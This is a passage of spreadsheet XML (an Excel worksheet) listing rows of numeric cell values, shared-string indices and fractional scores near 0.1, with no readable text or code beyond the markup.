      </c>
      <c r="C10310" s="2" t="s">
        <v>9869</v>
      </c>
      <c r="D10310" s="2">
        <v>1.0</v>
      </c>
      <c r="E10310" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10310" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10311" ht="15.75" customHeight="1">
      <c r="A10311" s="1">
        <v>24449.0</v>
      </c>
      <c r="B10311" s="2">
        <v>1.0919632E7</v>
      </c>
      <c r="C10311" s="2" t="s">
        <v>9870</v>
      </c>
      <c r="D10311" s="2">
        <v>1.0</v>
      </c>
      <c r="E10311" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10311" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10312" ht="15.75" customHeight="1">
      <c r="A10312" s="1">
        <v>24809.0</v>
      </c>
      <c r="B10312" s="2">
        <v>1.2042745E7</v>
      </c>
      <c r="C10312" s="2" t="s">
        <v>9871</v>
      </c>
      <c r="D10312" s="2">
        <v>1.0</v>
      </c>
      <c r="E10312" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10312" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10313" ht="15.75" customHeight="1">
      <c r="A10313" s="1">
        <v>25396.0</v>
      </c>
      <c r="B10313" s="2">
        <v>1.3707847E7</v>
      </c>
      <c r="C10313" s="2" t="s">
        <v>9864</v>
      </c>
      <c r="D10313" s="2">
        <v>1.0</v>
      </c>
      <c r="E10313" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10313" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10314" ht="15.75" customHeight="1">
      <c r="A10314" s="1">
        <v>25452.0</v>
      </c>
      <c r="B10314" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C10314" s="2" t="s">
        <v>9872</v>
      </c>
      <c r="D10314" s="2">
        <v>1.0</v>
      </c>
      <c r="E10314" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10314" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10315" ht="15.75" customHeight="1">
      <c r="A10315" s="1">
        <v>25468.0</v>
      </c>
      <c r="B10315" s="2">
        <v>1.3995169E7</v>
      </c>
      <c r="C10315" s="2" t="s">
        <v>9873</v>
      </c>
      <c r="D10315" s="2">
        <v>1.0</v>
      </c>
      <c r="E10315" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10315" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10316" ht="15.75" customHeight="1">
      <c r="A10316" s="1">
        <v>27459.0</v>
      </c>
      <c r="B10316" s="2">
        <v>2.1987101E7</v>
      </c>
      <c r="C10316" s="2" t="s">
        <v>9866</v>
      </c>
      <c r="D10316" s="2">
        <v>1.0</v>
      </c>
      <c r="E10316" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10316" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10317" ht="15.75" customHeight="1">
      <c r="A10317" s="1">
        <v>27585.0</v>
      </c>
      <c r="B10317" s="2">
        <v>2.2542472E7</v>
      </c>
      <c r="C10317" s="2" t="s">
        <v>9874</v>
      </c>
      <c r="D10317" s="2">
        <v>1.0</v>
      </c>
      <c r="E10317" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10317" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10318" ht="15.75" customHeight="1">
      <c r="A10318" s="1">
        <v>29022.0</v>
      </c>
      <c r="B10318" s="2">
        <v>3.0100945E7</v>
      </c>
      <c r="C10318" s="2" t="s">
        <v>9875</v>
      </c>
      <c r="D10318" s="2">
        <v>1.0</v>
      </c>
      <c r="E10318" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10318" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10319" ht="15.75" customHeight="1">
      <c r="A10319" s="1">
        <v>31173.0</v>
      </c>
      <c r="B10319" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C10319" s="2" t="s">
        <v>9876</v>
      </c>
      <c r="D10319" s="2">
        <v>1.0</v>
      </c>
      <c r="E10319" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10319" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10320" ht="15.75" customHeight="1">
      <c r="A10320" s="1">
        <v>31477.0</v>
      </c>
      <c r="B10320" s="2">
        <v>5048683.0</v>
      </c>
      <c r="C10320" s="2" t="s">
        <v>9877</v>
      </c>
      <c r="D10320" s="2">
        <v>1.0</v>
      </c>
      <c r="E10320" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10320" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10321" ht="15.75" customHeight="1">
      <c r="A10321" s="1">
        <v>32448.0</v>
      </c>
      <c r="B10321" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C10321" s="2" t="s">
        <v>9867</v>
      </c>
      <c r="D10321" s="2">
        <v>1.0</v>
      </c>
      <c r="E10321" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10321" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10322" ht="15.75" customHeight="1">
      <c r="A10322" s="1">
        <v>33124.0</v>
      </c>
      <c r="B10322" s="2">
        <v>7004794.0</v>
      </c>
      <c r="C10322" s="2" t="s">
        <v>9878</v>
      </c>
      <c r="D10322" s="2">
        <v>1.0</v>
      </c>
      <c r="E10322" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10322" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10323" ht="15.75" customHeight="1">
      <c r="A10323" s="1">
        <v>33454.0</v>
      </c>
      <c r="B10323" s="2">
        <v>7888966.0</v>
      </c>
      <c r="C10323" s="2" t="s">
        <v>9879</v>
      </c>
      <c r="D10323" s="2">
        <v>1.0</v>
      </c>
      <c r="E10323" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10323" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10324" ht="15.75" customHeight="1">
      <c r="A10324" s="1">
        <v>13813.0</v>
      </c>
      <c r="B10324" s="2">
        <v>3.6674361E7</v>
      </c>
      <c r="C10324" s="2" t="s">
        <v>9880</v>
      </c>
      <c r="D10324" s="2">
        <v>1.0</v>
      </c>
      <c r="E10324" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10324" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="10325" ht="15.75" customHeight="1">
      <c r="A10325" s="1">
        <v>33856.0</v>
      </c>
      <c r="B10325" s="2">
        <v>9044277.0</v>
      </c>
      <c r="C10325" s="2" t="s">
        <v>9881</v>
      </c>
      <c r="D10325" s="2">
        <v>1.0</v>
      </c>
      <c r="E10325" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10325" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="10326" ht="15.75" customHeight="1">
      <c r="A10326" s="1">
        <v>3021.0</v>
      </c>
      <c r="B10326" s="2">
        <v>3.6424079E7</v>
      </c>
      <c r="C10326" s="2" t="s">
        <v>9882</v>
      </c>
      <c r="D10326" s="2">
        <v>1.0</v>
      </c>
      <c r="E10326" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10326" s="2">
        <v>0.1009259259259259</v>
      </c>
    </row>
    <row r="10327" ht="15.75" customHeight="1">
      <c r="A10327" s="1">
        <v>8699.0</v>
      </c>
      <c r="B10327" s="2">
        <v>5.4433702E7</v>
      </c>
      <c r="C10327" s="2" t="s">
        <v>9883</v>
      </c>
      <c r="D10327" s="2">
        <v>1.0</v>
      </c>
      <c r="E10327" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10327" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="10328" ht="15.75" customHeight="1">
      <c r="A10328" s="1">
        <v>12495.0</v>
      </c>
      <c r="B10328" s="2">
        <v>2.9571072E7</v>
      </c>
      <c r="C10328" s="2" t="s">
        <v>9884</v>
      </c>
      <c r="D10328" s="2">
        <v>1.0</v>
      </c>
      <c r="E10328" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10328" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="10329" ht="15.75" customHeight="1">
      <c r="A10329" s="1">
        <v>11930.0</v>
      </c>
      <c r="B10329" s="2">
        <v>2.5429746E7</v>
      </c>
      <c r="C10329" s="2" t="s">
        <v>9885</v>
      </c>
      <c r="D10329" s="2">
        <v>1.0</v>
      </c>
      <c r="E10329" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10329" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="10330" ht="15.75" customHeight="1">
      <c r="A10330" s="1">
        <v>13478.0</v>
      </c>
      <c r="B10330" s="2">
        <v>3.5324107E7</v>
      </c>
      <c r="C10330" s="2" t="s">
        <v>9886</v>
      </c>
      <c r="D10330" s="2">
        <v>1.0</v>
      </c>
      <c r="E10330" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10330" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="10331" ht="15.75" customHeight="1">
      <c r="A10331" s="1">
        <v>17046.0</v>
      </c>
      <c r="B10331" s="2">
        <v>4.8532325E7</v>
      </c>
      <c r="C10331" s="2" t="s">
        <v>9887</v>
      </c>
      <c r="D10331" s="2">
        <v>1.0</v>
      </c>
      <c r="E10331" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10331" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="10332" ht="15.75" customHeight="1">
      <c r="A10332" s="1">
        <v>5139.0</v>
      </c>
      <c r="B10332" s="2">
        <v>4.4640129E7</v>
      </c>
      <c r="C10332" s="2" t="s">
        <v>9888</v>
      </c>
      <c r="D10332" s="2">
        <v>1.0</v>
      </c>
      <c r="E10332" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10332" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="10333" ht="15.75" customHeight="1">
      <c r="A10333" s="1">
        <v>26349.0</v>
      </c>
      <c r="B10333" s="2">
        <v>1.680511E7</v>
      </c>
      <c r="C10333" s="2" t="s">
        <v>9889</v>
      </c>
      <c r="D10333" s="2">
        <v>1.0</v>
      </c>
      <c r="E10333" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10333" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="10334" ht="15.75" customHeight="1">
      <c r="A10334" s="1">
        <v>2073.0</v>
      </c>
      <c r="B10334" s="2">
        <v>3.1125975E7</v>
      </c>
      <c r="C10334" s="2" t="s">
        <v>9890</v>
      </c>
      <c r="D10334" s="2">
        <v>1.0</v>
      </c>
      <c r="E10334" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10334" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10335" ht="15.75" customHeight="1">
      <c r="A10335" s="1">
        <v>12109.0</v>
      </c>
      <c r="B10335" s="2">
        <v>2.6853906E7</v>
      </c>
      <c r="C10335" s="2" t="s">
        <v>9891</v>
      </c>
      <c r="D10335" s="2">
        <v>1.0</v>
      </c>
      <c r="E10335" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10335" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10336" ht="15.75" customHeight="1">
      <c r="A10336" s="1">
        <v>14237.0</v>
      </c>
      <c r="B10336" s="2">
        <v>3.830811E7</v>
      </c>
      <c r="C10336" s="2" t="s">
        <v>9892</v>
      </c>
      <c r="D10336" s="2">
        <v>1.0</v>
      </c>
      <c r="E10336" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10336" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10337" ht="15.75" customHeight="1">
      <c r="A10337" s="1">
        <v>14706.0</v>
      </c>
      <c r="B10337" s="2">
        <v>4.0591767E7</v>
      </c>
      <c r="C10337" s="2" t="s">
        <v>9893</v>
      </c>
      <c r="D10337" s="2">
        <v>1.0</v>
      </c>
      <c r="E10337" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10337" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10338" ht="15.75" customHeight="1">
      <c r="A10338" s="1">
        <v>17296.0</v>
      </c>
      <c r="B10338" s="2">
        <v>4.9256502E7</v>
      </c>
      <c r="C10338" s="2" t="s">
        <v>9894</v>
      </c>
      <c r="D10338" s="2">
        <v>1.0</v>
      </c>
      <c r="E10338" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10338" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10339" ht="15.75" customHeight="1">
      <c r="A10339" s="1">
        <v>19983.0</v>
      </c>
      <c r="B10339" s="2">
        <v>5.7619311E7</v>
      </c>
      <c r="C10339" s="2" t="s">
        <v>9895</v>
      </c>
      <c r="D10339" s="2">
        <v>1.0</v>
      </c>
      <c r="E10339" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10339" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10340" ht="15.75" customHeight="1">
      <c r="A10340" s="1">
        <v>26141.0</v>
      </c>
      <c r="B10340" s="2">
        <v>1.6039151E7</v>
      </c>
      <c r="C10340" s="2" t="s">
        <v>9896</v>
      </c>
      <c r="D10340" s="2">
        <v>1.0</v>
      </c>
      <c r="E10340" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10340" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="10341" ht="15.75" customHeight="1">
      <c r="A10341" s="1">
        <v>9628.0</v>
      </c>
      <c r="B10341" s="2">
        <v>5.6224102E7</v>
      </c>
      <c r="C10341" s="2" t="s">
        <v>9897</v>
      </c>
      <c r="D10341" s="2">
        <v>1.0</v>
      </c>
      <c r="E10341" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10341" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="10342" ht="15.75" customHeight="1">
      <c r="A10342" s="1">
        <v>22178.0</v>
      </c>
      <c r="B10342" s="2">
        <v>3.1699985E7</v>
      </c>
      <c r="C10342" s="2" t="s">
        <v>9898</v>
      </c>
      <c r="D10342" s="2">
        <v>1.0</v>
      </c>
      <c r="E10342" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10342" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="10343" ht="15.75" customHeight="1">
      <c r="A10343" s="1">
        <v>29371.0</v>
      </c>
      <c r="B10343" s="2">
        <v>3.1699984E7</v>
      </c>
      <c r="C10343" s="2" t="s">
        <v>9898</v>
      </c>
      <c r="D10343" s="2">
        <v>1.0</v>
      </c>
      <c r="E10343" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10343" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="10344" ht="15.75" customHeight="1">
      <c r="A10344" s="1">
        <v>979.0</v>
      </c>
      <c r="B10344" s="2">
        <v>2.2806639E7</v>
      </c>
      <c r="C10344" s="2" t="s">
        <v>9899</v>
      </c>
      <c r="D10344" s="2">
        <v>1.0</v>
      </c>
      <c r="E10344" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10344" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="10345" ht="15.75" customHeight="1">
      <c r="A10345" s="1">
        <v>484.0</v>
      </c>
      <c r="B10345" s="2">
        <v>1.7503094E7</v>
      </c>
      <c r="C10345" s="2" t="s">
        <v>9900</v>
      </c>
      <c r="D10345" s="2">
        <v>1.0</v>
      </c>
      <c r="E10345" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10345" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10346" ht="15.75" customHeight="1">
      <c r="A10346" s="1">
        <v>673.0</v>
      </c>
      <c r="B10346" s="2">
        <v>2.0255194E7</v>
      </c>
      <c r="C10346" s="2" t="s">
        <v>6725</v>
      </c>
      <c r="D10346" s="2">
        <v>1.0</v>
      </c>
      <c r="E10346" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10346" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10347" ht="15.75" customHeight="1">
      <c r="A10347" s="1">
        <v>3954.0</v>
      </c>
      <c r="B10347" s="2">
        <v>4.0674107E7</v>
      </c>
      <c r="C10347" s="2" t="s">
        <v>9901</v>
      </c>
      <c r="D10347" s="2">
        <v>1.0</v>
      </c>
      <c r="E10347" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10347" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10348" ht="15.75" customHeight="1">
      <c r="A10348" s="1">
        <v>4952.0</v>
      </c>
      <c r="B10348" s="2">
        <v>4.4053344E7</v>
      </c>
      <c r="C10348" s="2" t="s">
        <v>9902</v>
      </c>
      <c r="D10348" s="2">
        <v>1.0</v>
      </c>
      <c r="E10348" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10348" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10349" ht="15.75" customHeight="1">
      <c r="A10349" s="1">
        <v>5172.0</v>
      </c>
      <c r="B10349" s="2">
        <v>4.4751794E7</v>
      </c>
      <c r="C10349" s="2" t="s">
        <v>9903</v>
      </c>
      <c r="D10349" s="2">
        <v>1.0</v>
      </c>
      <c r="E10349" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10349" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10350" ht="15.75" customHeight="1">
      <c r="A10350" s="1">
        <v>5696.0</v>
      </c>
      <c r="B10350" s="2">
        <v>4.6502102E7</v>
      </c>
      <c r="C10350" s="2" t="s">
        <v>9904</v>
      </c>
      <c r="D10350" s="2">
        <v>1.0</v>
      </c>
      <c r="E10350" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10350" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10351" ht="15.75" customHeight="1">
      <c r="A10351" s="1">
        <v>8900.0</v>
      </c>
      <c r="B10351" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C10351" s="2" t="s">
        <v>9905</v>
      </c>
      <c r="D10351" s="2">
        <v>1.0</v>
      </c>
      <c r="E10351" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10351" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10352" ht="15.75" customHeight="1">
      <c r="A10352" s="1">
        <v>13491.0</v>
      </c>
      <c r="B10352" s="2">
        <v>3.5394762E7</v>
      </c>
      <c r="C10352" s="2" t="s">
        <v>9906</v>
      </c>
      <c r="D10352" s="2">
        <v>1.0</v>
      </c>
      <c r="E10352" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10352" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10353" ht="15.75" customHeight="1">
      <c r="A10353" s="1">
        <v>19327.0</v>
      </c>
      <c r="B10353" s="2">
        <v>5.5317646E7</v>
      </c>
      <c r="C10353" s="2" t="s">
        <v>9907</v>
      </c>
      <c r="D10353" s="2">
        <v>1.0</v>
      </c>
      <c r="E10353" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10353" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10354" ht="15.75" customHeight="1">
      <c r="A10354" s="1">
        <v>19431.0</v>
      </c>
      <c r="B10354" s="2">
        <v>5.5693253E7</v>
      </c>
      <c r="C10354" s="2" t="s">
        <v>9908</v>
      </c>
      <c r="D10354" s="2">
        <v>1.0</v>
      </c>
      <c r="E10354" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10354" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10355" ht="15.75" customHeight="1">
      <c r="A10355" s="1">
        <v>19583.0</v>
      </c>
      <c r="B10355" s="2">
        <v>5.6155241E7</v>
      </c>
      <c r="C10355" s="2" t="s">
        <v>9909</v>
      </c>
      <c r="D10355" s="2">
        <v>1.0</v>
      </c>
      <c r="E10355" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10355" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10356" ht="15.75" customHeight="1">
      <c r="A10356" s="1">
        <v>33142.0</v>
      </c>
      <c r="B10356" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C10356" s="2" t="s">
        <v>9910</v>
      </c>
      <c r="D10356" s="2">
        <v>1.0</v>
      </c>
      <c r="E10356" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10356" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="10357" ht="15.75" customHeight="1">
      <c r="A10357" s="1">
        <v>9328.0</v>
      </c>
      <c r="B10357" s="2">
        <v>5.5598663E7</v>
      </c>
      <c r="C10357" s="2" t="s">
        <v>9911</v>
      </c>
      <c r="D10357" s="2">
        <v>1.0</v>
      </c>
      <c r="E10357" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10357" s="2">
        <v>0.09979423868312753</v>
      </c>
    </row>
    <row r="10358" ht="15.75" customHeight="1">
      <c r="A10358" s="1">
        <v>12728.0</v>
      </c>
      <c r="B10358" s="2">
        <v>3.0938247E7</v>
      </c>
      <c r="C10358" s="2" t="s">
        <v>9912</v>
      </c>
      <c r="D10358" s="2">
        <v>1.0</v>
      </c>
      <c r="E10358" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10358" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="10359" ht="15.75" customHeight="1">
      <c r="A10359" s="1">
        <v>18109.0</v>
      </c>
      <c r="B10359" s="2">
        <v>5.174432E7</v>
      </c>
      <c r="C10359" s="2" t="s">
        <v>9913</v>
      </c>
      <c r="D10359" s="2">
        <v>1.0</v>
      </c>
      <c r="E10359" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10359" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="10360" ht="15.75" customHeight="1">
      <c r="A10360" s="1">
        <v>1100.0</v>
      </c>
      <c r="B10360" s="2">
        <v>2.3914382E7</v>
      </c>
      <c r="C10360" s="2" t="s">
        <v>9914</v>
      </c>
      <c r="D10360" s="2">
        <v>1.0</v>
      </c>
      <c r="E10360" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10360" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10361" ht="15.75" customHeight="1">
      <c r="A10361" s="1">
        <v>1414.0</v>
      </c>
      <c r="B10361" s="2">
        <v>2.6482398E7</v>
      </c>
      <c r="C10361" s="2" t="s">
        <v>9915</v>
      </c>
      <c r="D10361" s="2">
        <v>1.0</v>
      </c>
      <c r="E10361" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10361" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10362" ht="15.75" customHeight="1">
      <c r="A10362" s="1">
        <v>5950.0</v>
      </c>
      <c r="B10362" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C10362" s="2" t="s">
        <v>9916</v>
      </c>
      <c r="D10362" s="2">
        <v>1.0</v>
      </c>
      <c r="E10362" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10362" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10363" ht="15.75" customHeight="1">
      <c r="A10363" s="1">
        <v>6463.0</v>
      </c>
      <c r="B10363" s="2">
        <v>4.8633527E7</v>
      </c>
      <c r="C10363" s="2" t="s">
        <v>9917</v>
      </c>
      <c r="D10363" s="2">
        <v>1.0</v>
      </c>
      <c r="E10363" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10363" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10364" ht="15.75" customHeight="1">
      <c r="A10364" s="1">
        <v>7301.0</v>
      </c>
      <c r="B10364" s="2">
        <v>5.0837609E7</v>
      </c>
      <c r="C10364" s="2" t="s">
        <v>7180</v>
      </c>
      <c r="D10364" s="2">
        <v>1.0</v>
      </c>
      <c r="E10364" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10364" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10365" ht="15.75" customHeight="1">
      <c r="A10365" s="1">
        <v>12807.0</v>
      </c>
      <c r="B10365" s="2">
        <v>3.1549104E7</v>
      </c>
      <c r="C10365" s="2" t="s">
        <v>9918</v>
      </c>
      <c r="D10365" s="2">
        <v>1.0</v>
      </c>
      <c r="E10365" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10365" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10366" ht="15.75" customHeight="1">
      <c r="A10366" s="1">
        <v>15535.0</v>
      </c>
      <c r="B10366" s="2">
        <v>4.3323291E7</v>
      </c>
      <c r="C10366" s="2" t="s">
        <v>9919</v>
      </c>
      <c r="D10366" s="2">
        <v>1.0</v>
      </c>
      <c r="E10366" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10366" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10367" ht="15.75" customHeight="1">
      <c r="A10367" s="1">
        <v>23225.0</v>
      </c>
      <c r="B10367" s="2">
        <v>5284011.0</v>
      </c>
      <c r="C10367" s="2" t="s">
        <v>9920</v>
      </c>
      <c r="D10367" s="2">
        <v>1.0</v>
      </c>
      <c r="E10367" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10367" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="10368" ht="15.75" customHeight="1">
      <c r="A10368" s="1">
        <v>2325.0</v>
      </c>
      <c r="B10368" s="2">
        <v>3.290246E7</v>
      </c>
      <c r="C10368" s="2" t="s">
        <v>9921</v>
      </c>
      <c r="D10368" s="2">
        <v>1.0</v>
      </c>
      <c r="E10368" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10368" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="10369" ht="15.75" customHeight="1">
      <c r="A10369" s="1">
        <v>2431.0</v>
      </c>
      <c r="B10369" s="2">
        <v>3.3610079E7</v>
      </c>
      <c r="C10369" s="2" t="s">
        <v>9922</v>
      </c>
      <c r="D10369" s="2">
        <v>1.0</v>
      </c>
      <c r="E10369" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10369" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="10370" ht="15.75" customHeight="1">
      <c r="A10370" s="1">
        <v>8418.0</v>
      </c>
      <c r="B10370" s="2">
        <v>5.3918365E7</v>
      </c>
      <c r="C10370" s="2" t="s">
        <v>9923</v>
      </c>
      <c r="D10370" s="2">
        <v>1.0</v>
      </c>
      <c r="E10370" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10370" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="10371" ht="15.75" customHeight="1">
      <c r="A10371" s="1">
        <v>10765.0</v>
      </c>
      <c r="B10371" s="2">
        <v>1.5591021E7</v>
      </c>
      <c r="C10371" s="2" t="s">
        <v>9924</v>
      </c>
      <c r="D10371" s="2">
        <v>1.0</v>
      </c>
      <c r="E10371" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10371" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="10372" ht="15.75" customHeight="1">
      <c r="A10372" s="1">
        <v>22663.0</v>
      </c>
      <c r="B10372" s="2">
        <v>4.1347867E7</v>
      </c>
      <c r="C10372" s="2" t="s">
        <v>9925</v>
      </c>
      <c r="D10372" s="2">
        <v>1.0</v>
      </c>
      <c r="E10372" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10372" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="10373" ht="15.75" customHeight="1">
      <c r="A10373" s="1">
        <v>34190.0</v>
      </c>
      <c r="B10373" s="2">
        <v>9958437.0</v>
      </c>
      <c r="C10373" s="2" t="s">
        <v>9926</v>
      </c>
      <c r="D10373" s="2">
        <v>1.0</v>
      </c>
      <c r="E10373" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10373" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="10374" ht="15.75" customHeight="1">
      <c r="A10374" s="1">
        <v>20400.0</v>
      </c>
      <c r="B10374" s="2">
        <v>1.2170313E7</v>
      </c>
      <c r="C10374" s="2" t="s">
        <v>9927</v>
      </c>
      <c r="D10374" s="2">
        <v>1.0</v>
      </c>
      <c r="E10374" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10374" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="10375" ht="15.75" customHeight="1">
      <c r="A10375" s="1">
        <v>14.0</v>
      </c>
      <c r="B10375" s="2">
        <v>1.0326698E7</v>
      </c>
      <c r="C10375" s="2" t="s">
        <v>9928</v>
      </c>
      <c r="D10375" s="2">
        <v>1.0</v>
      </c>
      <c r="E10375" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10375" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10376" ht="15.75" customHeight="1">
      <c r="A10376" s="1">
        <v>200.0</v>
      </c>
      <c r="B10376" s="2">
        <v>1.4435257E7</v>
      </c>
      <c r="C10376" s="2" t="s">
        <v>9929</v>
      </c>
      <c r="D10376" s="2">
        <v>1.0</v>
      </c>
      <c r="E10376" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10376" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="10377" ht="15.75" customHeight="1">
      <c r="A10377" s="1">
        <v>314.0</v>
      </c>
      <c r="B10377" s="2">
        <v>1.5621246E7</v>
      </c>
      <c r="C10377" s="2" t="s">
